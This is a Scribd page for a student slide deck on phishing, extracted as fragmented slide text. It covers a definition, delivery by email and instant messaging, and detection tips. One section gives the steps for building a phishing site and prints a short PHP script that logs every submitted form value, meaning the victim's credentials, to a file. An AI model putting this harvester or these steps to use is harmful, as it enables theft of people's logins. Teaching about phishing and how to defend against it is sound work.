0% found this document useful (0 votes)
202 views20 pages

Understanding Phishing Techniques

This document discusses phishing, including how to create a phishing site, how phishing works, and how to detect and prevent phishing attacks. It defines phishing as attempting to acquire sensitive information like usernames, passwords, and credit cards. It describes the three steps to create a phishing site: making a fake login page, redirecting users to it, and using PHP scripts to steal entered information. It explains how phishing works through links in emails or instant messages. It also provides tips for detecting phishing sites such as checking for HTTPS, digital signatures, redirecting after entering the wrong password, and email notices.

Uploaded by

goldraviteja
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
202 views20 pages

Understanding Phishing Techniques

This document discusses phishing, including how to create a phishing site, how phishing works, and how to detect and prevent phishing attacks. It defines phishing as attempting to acquire sensitive information like usernames, passwords, and credit cards. It describes the three steps to create a phishing site: making a fake login page, redirecting users to it, and using PHP scripts to steal entered information. It explains how phishing works through links in emails or instant messages. It also provides tips for detecting phishing sites such as checking for HTTPS, digital signatures, redirecting after entering the wrong password, and email notices.

Uploaded by

goldraviteja
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd

Phishing

Guided By
[Link] Jagan Shekar BY
Asst Professor [Link]
Dept of IT IT(07U41A1240)
Contents
Introduction
How to make a phisher site?
How to use a phisher site?
How the phishing happens/done?
Detecting phishing sites?
Preventing from phisher
Reporting phishing
Introduction
History:
Introduced in 1987, and the first use of the term
"phishing" was made in 1996.

Definition:
Process of attempting to acquire sensitive
information such as usernames, passwords and credit
card details.
How to make a phisher site?
Making a Phishing site contains 3 steps:

Creating the login page.

Redirecting.

Embedding Script(PHP).
Creating a login page:
Redirecting
Original site redirection Fake site redirection
Embedding Script(PHP)

<?phpheader("");
   $handle = fopen("[Link]", "a");
   foreach($_GET as $variable => $value)
{
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
  }
  fwrite($handle, "\r\n");
  fclose($handle);
  exit;?>
How the phishing happens/done?
Instant messaging
While chatting with someone by using the
Messenger’s like yahoo,[Link].
Links to
fake
page of
corresp
onding
site
How The Phishing happens/done?
[Link]
Fake E-mails [Link]-
bankin/lo
[Link]
Structure of phishing

1 7
5
6
2

3
4
Detecting & Preventing Phishing Sites

HTTP – HTTPS

Digital Signatures

Wrong password (redirecting)

Email notice
• HTTP-HTTPS
• HTTP-HTTPS
• Digital signatures…
• Wrong Password (Redirecting)
• Email notice

• Wrong Password (Redirecting)

Not the real


address bar
Reporting Phishing
Queries plzzzzzz

You might also like